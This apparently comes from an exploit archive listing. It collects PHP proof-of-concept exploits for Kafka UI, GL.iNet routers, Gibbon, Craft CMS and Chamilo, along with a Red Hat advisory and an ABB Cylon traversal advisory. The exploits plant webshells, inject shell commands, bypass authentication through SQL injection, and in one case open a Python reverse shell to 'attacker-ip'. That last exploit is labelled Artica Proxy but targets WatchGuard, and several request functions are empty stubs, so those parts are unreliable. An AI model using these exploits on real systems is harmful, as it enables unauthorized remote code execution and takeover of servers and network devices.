Kafka UI version 0.7.1 suffers from a remote code injection vulnerability.

    =============================================================================================================================================| # Title     : Kafka UI 0.7.1 Code Injection Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://github.com/provectus/kafka-ui/                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 159 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass KafkaUIExploit {    private $target;    private $version;    private $cluster;    private $new_topic;    public function __construct($target) {        $this->target = $target;    }    public function vuln_version() {        $uri = $this->normalize_uri('/actuator/info');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            if (!empty($json_response)) {                if (isset($json_response['build']['version'])) {                    $this->version = ltrim($json_response['build']['version'], 'v');                } elseif (isset($json_response['git']['commit']['id'])) {                    // Git commit versioning (this part should check with a local list if needed)                    $git_commit_id = substr($json_response['git']['commit']['id'], 0, 7);                    // Implement logic to map git commit to version                }                return version_compare($this->version, '0.7.1', '<=') && version_compare($this->version, '0.4.0', '>=');            }        }        return false;    }    public function get_cluster() {        $uri = $this->normalize_uri('/api/clusters');        $response = $this->send_request('GET', $uri, 'application/json');        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            foreach ($json_response as $cluster) {                if ($cluster['status'] == 'online' || $cluster['topicCount'] > 0) {                    return $cluster['name'];                }            }        }        return null;    }    public function create_topic($cluster) {        $topic_name = $this->random_string(8);        $post_data = json_encode([            'name' => $topic_name,            'partitions' => 1,            'replicationFactor' => 1,            'configs' => [                'cleanup.policy' => 'delete',                'retention.bytes' => '-1'            ]        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        if ($response && $response['status_code'] == 200) {            $json_response = json_decode($response['body'], true);            return $json_response['name'];        }        return null;    }    public function delete_topic($cluster, $topic) {        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic");        $response = $this->send_request('DELETE', $uri, 'application/json');        return $response['status_code'] == 200;    }    public function produce_message($cluster, $topic) {        $post_data = json_encode([            'partition' => 0,            'key' => 'null',            'content' => 'null',            'keySerde' => 'String',            'valueSerde' => 'String'        ]);        $uri = $this->normalize_uri("/api/clusters/$cluster/topics/$topic/messages");        $response = $this->send_request('POST', $uri, 'application/json', $post_data);        return $response['status_code'] == 200;    }    public function execute_command($cmd) {        $payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"$cmd\").redirectErrorStream(true).start()";        $uri = $this->normalize_uri("/api/clusters/{$this->cluster}/topics/{$this->new_topic}/messages");        $params = [            'q' => $payload,            'filterQueryType' => 'GROOVY_SCRIPT',            'attempt' => 2,            'limit' => 100,            'page' => 0,            'seekDirection' => 'FORWARD',            'keySerde' => 'String',            'valueSerde' => 'String',            'seekType' => 'BEGINNING'        ];        return $this->send_request('GET', $uri, 'application/x-www-form-urlencoded', '', $params);    }    public function check() {        if ($this->vuln_version()) {            return "Kafka-ui version: {$this->version} is vulnerable";        }        return "Kafka-ui version is not vulnerable or unknown.";    }    public function exploit() {        $this->cluster = $this->get_cluster();        if (!$this->cluster) {            die("Could not find or connect to an active Kafka cluster.");        }        $this->new_topic = $this->create_topic($this->cluster);        if (!$this->new_topic) {            die("Could not create a new topic.");        }        if (!$this->produce_message($this->cluster, $this->new_topic)) {            die("Failed to trigger Groovy script payload execution.");        }        $this->execute_command('your_command_here'); // Replace with your desired command        if ($this->delete_topic($this->cluster, $this->new_topic)) {            echo "Successfully deleted topic {$this->new_topic}.";        } else {            echo "Could not delete topic {$this->new_topic}. Manual cleanup required.";        }    }    private function send_request($method, $uri, $content_type, $data = '', $params = []) {        // Placeholder for HTTP request logic (curl, file_get_contents, etc.)        // Implement this function with your desired HTTP request library in PHP        return [            'status_code' => 200,            'body' => '{}'        ];    }    private function normalize_uri($path) {        return $this->target . $path;    }    private function random_string($length) {        return bin2hex(random_bytes($length / 2));    }}// Example usage:$exploit = new KafkaUIExploit("http://target.com");echo $exploit->check();$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Kafka UI 0.7.1 Code Injection

Red Hat Security Advisory 2024-7972-03 - An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available. The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products. Red Hat Product Security has rated this update as having a security impact of Critical. Issues addressed include a code execution vulnerability.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7972.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1)  
Advisory ID:        RHSA-2024:7972-03  
Product:            Red Hat Build of Apache Camel  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7972  
Issue date:         2024-10-10  
Revision:           03  
CVE Names:          CVE-2024-7254  
====================================================================

Summary: 

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products.  
Red Hat Product Security has rated this update as having a security impact of Critical.

Description:

An update for Red Hat Build of Apache Camel 4.4 for Quarkus 3.8 update is now available (RHBQ 3.8.6.SP1).  
The purpose of this text-only errata is to inform you about the enhancements that improve your developer experience and ensure the security and stability of your products:  
* CVE-2024-47561 org.apache.avro/avro: Schema parsing may trigger Remote Code Execution (RCE)  
* CVE-2024-7254 com.google.protobuf/protobuf-java: StackOverflow vulnerability in Protocol Buffers

Solution:

CVEs:

CVE-2024-7254

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2313454  
https://bugzilla.redhat.com/show_bug.cgi?id=2316116

Red Hat Security Advisory 2024-7972-03

GL.iNet version 4.4.3 suffers from authentication bypass and code injection vulnerabilities.

    =============================================================================================================================================| # Title     : GL.iNet network 4.4.3 Code Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://www.gl-inet.com/                                                                                                    |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 158 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GlinetExploit{    private $targetUri;    private $sid;    private $glinet;    public function __construct($targetUri)    {        $this->targetUri = $targetUri;        $this->glinet = [            'model' => null,            'firmware' => null,            'arch' => null        ];    }    private function send_request($method, $uri, $data = null, $headers = [])    {        $ch = curl_init();        $options = [            CURLOPT_URL => $this->targetUri . $uri,            CURLOPT_RETURNTRANSFER => true,            CURLOPT_CUSTOMREQUEST => $method        ];        if ($data) {            $options[CURLOPT_POSTFIELDS] = $data;            $headers[] = 'Content-Type: application/json';        }        curl_setopt_array($ch, $options);        $response = curl_exec($ch);        curl_close($ch);        return $response ? json_decode($response, true) : null;    }    public function check_vuln_version()    {        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => ['', 'ui', 'check_initialized', []]        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result'])) {            $this->glinet['model'] = $res['result']['model'];            $this->glinet['firmware'] = $res['result']['firmware_version'];        }        // Check for vulnerable models and firmware        switch ($this->glinet['model']) {            case 'sft1200':                $this->glinet['arch'] = 'mipsle';                return version_compare($this->glinet['firmware'], '4.3.6', '==');            case 'ar750':            case 'ar750s':                $this->glinet['arch'] = 'mipsbe';                return version_compare($this->glinet['firmware'], '4.3.7', '==');            // Add more cases as per your requirement        }        return false;    }    public function auth_bypass()    {        if (!empty($this->sid)) {            return $this->sid;        }        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'challenge',            'params' => ['username' => 'root']        ]);        $res = $this->send_request('POST', '/rpc', $postData);        if ($res && isset($res['result']['nonce'])) {            $nonce = $res['result']['nonce'];            $username = "roo[^'union selecT char(114,111,111,116)--]:[^:]+:[^:]+";            $pw = '0';            $hash = md5("$username:$pw:$nonce");            $postData = json_encode([                'jsonrpc' => '2.0',                'id' => rand(1000, 9999),                'method' => 'login',                'params' => [                    'username' => $username,                    'hash' => $hash                ]            ]);            $res = $this->send_request('POST', '/rpc', $postData);            if ($res && isset($res['result']['sid'])) {                $this->sid = $res['result']['sid'];                return $this->sid;            }        }        return null;    }    public function execute_command($cmd)    {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -base64 -d -A|sh";        $postData = json_encode([            'jsonrpc' => '2.0',            'id' => rand(1000, 9999),            'method' => 'call',            'params' => [                $this->sid,                'logread',                'get_system_log',                ['lines' => '', 'module' => "|{$cmd}"]            ]        ]);        return $this->send_request('POST', '/rpc', $postData, ['Admin-Token: ' . $this->sid]);    }    public function check()    {        if ($this->check_vuln_version()) {            return "Vulnerable: {$this->glinet['model']} | {$this->glinet['firmware']} | {$this->glinet['arch']}";        }        return 'Not Vulnerable';    }    public function exploit($command)    {        $this->sid = $this->auth_bypass();        if ($this->sid) {            echo "SID: {$this->sid}\n";            echo "Executing: {$command}\n";            $this->execute_command($command);        } else {            echo "Authentication bypass failed.\n";        }    }}// Usage$exploit = new GlinetExploit('https://target-url');$exploit->exploit('ls');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

GL.iNet 4.4.3 Code Injection

Gibbon School Platform version 26.0.00 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Gibbon School Platform 26.0.00 Code Injection Vulnerability                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://gibbonedu.org/                                                                                                      |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 108 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GibbonExploit{    private $target_uri;    private $username;    private $password;    private $webshell_name;    public function __construct($target_uri, $username, $password, $webshell_name = null)    {        $this->target_uri = $target_uri;        $this->username = $username;        $this->password = $password;        $this->webshell_name = $webshell_name ?: $this->randomString() . '.php';    }    private function send_request($method, $url, $data = null, $headers = [])    {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function gibbon_login()    {        $login_url = $this->target_uri . '/login.php?timeout=true';        $data = [            'address' => '',            'method' => 'default',            'username' => $this->username,            'password' => $this->password,            'gibbonSchoolYearID' => '025',            'gibboni18nID' => '0002'        ];        return $this->send_request('POST', $login_url, http_build_query($data));    }    private function construct_form_data($payload)    {        $payload_len = strlen($payload);        $payload_data = 'a:2:{i:7;O:32:"Monolog\\Handler\\SyslogUdpHandler":1:{s:9:"\x00*\x00socket";O:29:"Monolog\\Handler\\BufferHandler":7:{s:10:"\x00*\x00handler";r:3;s:13:"\x00*\x00bufferSize";i:-1;s:9:"\x00*\x00buffer";a:1:{i:0;a:2:{i:0;s:' . $payload_len . ':"' . $payload . '";s:5:"level";N;}}s:8:"\x00*\x00level";N;s:14:"\x00*\x00initialized";b:1;s:14:"\x00*\x00bufferLimit";i:-1;s:13:"\x00*\x00processors";a:2:{i:0;s:7:"current";i:1;s:6:"system";}}}i:7;i:7;}';        $form_data = [            'address' => '/modules/System Admin/import_run.php',            'mode' => 'sync',            'syncField' => 'N',            'syncColumn' => '',            'columnOrder' => $payload_data,            'columnText' => 'N;',            'fieldDelimiter' => '%2C',            'stringEnclosure' => '%22',            'filename' => $this->randomString() . '.xlsx',            'csvData' => '"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"',            'ignoreErrors' => '1',            'Failed' => 'Submit'        ];        return $form_data;    }    public function upload_webshell($b64_payload)    {        $php_payload = "echo \"<?php @eval(base64_decode('$b64_payload'));?>\" > " . $this->webshell_name;        $form_data = $this->construct_form_data($php_payload);        $url = $this->target_uri . '/index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4';        return $this->send_request('POST', $url, http_build_query($form_data));    }    public function execute_php($cmd)    {        $b64_payload = base64_encode($cmd);        $res = $this->upload_webshell($b64_payload);        if (!$res) {            die('Web shell upload error.');        }        // execute the webshell        $url = $this->target_uri . '/' . $this->webshell_name;        return $this->send_request('GET', $url);    }    private function randomString($length = 10)    {        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new GibbonExploit('https://target-site.com', 'username@example.com', 'password');$exploit->gibbon_login();$response = $exploit->execute_php('phpinfo();');echo $response;Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Gibbon School Platform 26.0.00 Code Injection

Craft CMS version 4.4.14 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Craft CMS 4.4.14 Code Injection Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://craftcms.com/                                                                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 116 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass CraftCMSExploit {    private $target_uri;    private $webshell;    private $config = ['upload_tmp_dir' => null, 'document_root' => null];    private $post_param;    private $get_param;    public function __construct($target_uri, $webshell = '') {        $this->target_uri = $target_uri;        $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';        $this->post_param = $this->generateRandomString(1, 8);        $this->get_param = $this->generateRandomString(1, 8);    }    public function check_phpinfo() {        // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()        $data = http_build_query([            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'        ]);        $response = $this->sendPostRequest($this->target_uri, $data);        if ($response) {            $this->parsePHPInfo($response);        }    }    private function parsePHPInfo($response) {        // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root        if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);        }        if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {            $this->config['document_root'] = trim($matches[1]);        }    }    public function upload_webshell() {        // Generates an XML payload to upload the webshell via Imagick MSL        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>        <image>            <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />            <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />        </image>";        $form_data = [            'action' => 'conditions/render',            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',            'payload' => $payload        ];        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);        return strpos($response, '502') !== false;    }    public function execute_command($cmd) {        // Executes a command on the server via the uploaded webshell        $payload = base64_encode($cmd);        $data = http_build_query([$this->post_param => $payload]);        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);    }    private function sendPostRequest($uri, $data) {        $options = [            'http' => [                'header' => "Content-type: application/x-www-form-urlencoded\r\n",                'method' => 'POST',                'content' => $data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function sendMultipartPostRequest($uri, $data) {        // Sends a multipart form-data POST request        $boundary = uniqid();        $delimiter = '------' . $boundary;        $post_data = $this->buildMultipartData($data, $delimiter);        $options = [            'http' => [                'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",                'method' => 'POST',                'content' => $post_data,            ],        ];        $context = stream_context_create($options);        return file_get_contents($uri, false, $context);    }    private function buildMultipartData($data, $delimiter) {        $post_data = '';        foreach ($data as $name => $content) {            $post_data .= "--$delimiter\r\n";            $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";            $post_data .= "$content\r\n";        }        $post_data .= "--$delimiter--\r\n";        return $post_data;    }    private function generateRandomString($min, $max) {        $length = rand($min, $max);        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);    }}// Usage$exploit = new CraftCMSExploit('http://target-craftcms.com');$exploit->check_phpinfo();if ($exploit->upload_webshell()) {    echo $exploit->execute_command('whoami');}?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Craft CMS 4.4.14 Code Injection

Chamilo version 1.11.18 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Chamilo 1.11.18 Code Injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 123 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass ChamiloExploit {    private $targetUri;    private $webshellName;    private $postParam;    public function __construct($targetUri, $webshell = null) {        $this->targetUri = rtrim($targetUri, '/');        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(8)) . '.php';    }    private function soapRequest($cmd) {        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);        return <<<EOS<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"    xmlns:ns1="{$this->targetUri}"    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"    xmlns:xsd="http://www.w3.org/2001/XMLSchema"    xmlns:ns2="http://xml.apache.org/xml-soap"    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">    <SOAP-ENV:Body>        <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">                <item>                    <key xsi:type="xsd:string">file_data</key>                    <value xsi:type="xsd:string"></value>                </item>                <item>                    <key xsi:type="xsd:string">file_name</key>                    <value xsi:type="xsd:string">`{{}}`.pptx'|" |{$cmd}||a #</value>                </item>                <item>                    <key xsi:type="xsd:string">service_ppt2lp_size</key>                    <value xsi:type="xsd:string">{$pptSize}</value>                </item>            </param0>        </ns1:wsConvertPpt>    </SOAP-ENV:Body></SOAP-ENV:Envelope>EOS;    }    public function uploadWebshell() {        $this->postParam = bin2hex(random_bytes(4));        $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";        $pngWebshell = $this->injectPhpPayloadPng($phpPayload);        if ($pngWebshell === null) {            return null;        }        $payload = base64_encode($pngWebshell);        $cmd = "echo {$payload}|openssl enc -a -d > ./{$this->webshellName}";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    private function injectPhpPayloadPng($phpPayload) {        // Implement your logic to inject PHP payload into a PNG image        // For demonstration purposes, we'll return a dummy PNG data        return pack('H*', '89504E470D0A1A0A...'); // Example PNG header    }    public function executePhp($cmd) {        $payload = base64_encode($cmd);        $response = $this->sendRequest('POST', "/main/inc/lib/ppt2png/{$this->webshellName}", "application/x-www-form-urlencoded", [$this->postParam => $payload]);        return $response;    }    public function executeCommand($cmd) {        $payload = base64_encode($cmd);        $cmd = "echo {$payload}|openssl enc -a -d|sh";        $response = $this->sendRequest('POST', "/main/webservices/additional_webservices.php", "text/xml; charset=utf-8", $this->soapRequest($cmd));        return $response;    }    public function check() {        $marker = bin2hex(random_bytes(4));        $res = $this->executeCommand("echo {$marker}");        if ($res && strpos($res, 'wsConvertPptResponse') !== false && strpos($res, $marker) !== false) {            return 'Vulnerable';        } else {            return 'Safe';        }    }    public function exploit($payload) {        switch ($payload['type']) {            case 'php':                $res = $this->uploadWebshell();                if (!$res || strpos($res, 'wsConvertPptResponse') === false) {                    throw new Exception('Web shell upload error.');                }                $this->executePhp($payload['encoded']);                break;            case 'unix_cmd':                $this->executeCommand($payload['encoded']);                break;            case 'linux_dropper':                // Implement Linux dropper logic                break;        }    }    private function sendRequest($method, $uri, $ctype, $data) {        // Implement your HTTP request logic here (using cURL or similar)        // For demonstration purposes, return a dummy response        return 'Dummy response';    }}// Usage$exploit = new ChamiloExploit('http://target.com', 'webshell.php');$exploit->check();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Chamilo 1.11.18 Code Injection

Artica Proxy version 4.40 suffers from a code injection vulnerability that provides a reverse shell.

    =============================================================================================================================================| # Title     : Artica Proxy appliance 4.40 Code Injection Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://artica-proxy.com/                                                                                                   |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 97 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass WatchGuardExploit {    private $targetUri;    private $lhost;    private $lport;    private $shell;    public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {        $this->targetUri = $targetUri;        $this->lhost = $lhost;        $this->lport = $lport;        $this->shell = $shell;    }    public function sendRequest($method, $url, $data = null, $headers = []) {        $ch = curl_init();        curl_setopt($ch, CURLOPT_URL, $url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        if (!empty($headers)) {            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        }        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function checkWatchGuardFirebox() {        $url = $this->targetUri . '/auth/login';        $response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);                if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false             && strpos($response, 'Firebox') !== false) {            return true;        }        return false;    }    public function createBofPayload() {        // Generate the buffer overflow payload with Python reverse shell code        $randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric        $pyFilename = "/tmp/" . $randomStr . ".py";        $payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";        $payload .= str_repeat('<BBBBMFA>', 3680);        // Include a Python reverse shell command as the payload        $payload .= 'import socket;from subprocess import call; from os import dup2;';        $payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';        $payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';        $payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';        $payload .= 'call(["' . $this->shell . '","-i"]);';        $payload .= 'import os; os.remove("' . $pyFilename . '");';        return gzencode($payload); // gzip encoding    }    public function exploit() {        if (!$this->checkWatchGuardFirebox()) {            echo "Target is not vulnerable.\n";            return;        }        echo "Target is vulnerable. Sending exploit...\n";        $bofPayload = $this->createBofPayload();        // Send the buffer overflow payload        $url = $this->targetUri . '/agent/login';        $this->sendRequest('POST', $url, $bofPayload, [            'Accept-Encoding: gzip, deflate',            'Content-Encoding: gzip'        ]);        echo "Payload sent.\n";    }}// Example usage:$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);$exploit->exploit();Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Artica Proxy 4.40 Code Injection

XNU suffers from a race condition leading to a use-after-free between the NFSSVC_NFSD command and an upcall worker thread.

XNU Insufficient Locking Use-After-Free

ABB Cylon Aspect version 3.08.01 has a directory traversal vulnerability that can be exploited by an unauthenticated attacker to list the contents of arbitrary directories without reading file contents, leading to information disclosure of directory structures and filenames. This may expose sensitive system details, aiding in further attacks. The issue lies in the listFiles() function of the persistenceManagerAjax.php script, which calls PHP's readdir() function without proper input validation of the directory POST parameter.

    ABB Cylon Aspect 3.08.01 (persistenceManagerAjax.php) Directory TraversalVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The BMS/BAS controller has a directory traversal vulnerability thatcan be exploited by an unauthenticated attacker to list the contents ofarbitrary directories without reading file contents, leading to informationdisclosure of directory structures and filenames. This may expose sensitivesystem details, aiding in further attacks. The issue lies in the listFiles()function of the persistenceManagerAjax.php script, which calls PHP's readdir()function without proper input validation of the 'directory' POST parameter.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5837Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5837.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                            